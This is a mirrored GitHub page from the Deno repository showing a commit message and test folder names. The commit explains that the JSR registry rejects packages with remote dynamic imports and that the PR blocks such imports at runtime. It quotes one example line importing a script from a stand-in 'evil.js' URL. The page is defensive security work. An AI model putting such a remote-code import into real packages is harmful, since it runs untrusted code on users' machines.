mirror of
https://github.com/denoland/deno.git
synced 2025-02-05 06:05:54 -05:00
![]() A security feature of JSR is that it is self contained other than npm dependencies. At publish time, the registry rejects packages that write code like this: ```ts const data = await import("https://example.com/evil.js"); ``` However, this can be trivially bypassed by writing code that the registry cannot statically analyze for. This PR prevents Deno from loading dynamic imports that do this. |
||
---|---|---|
.. | ||
add | ||
bad-manifest-checksum | ||
deps | ||
import-https-url | ||
module_graph | ||
no_module_graph | ||
subset_type_graph | ||
subset_type_graph_invalid |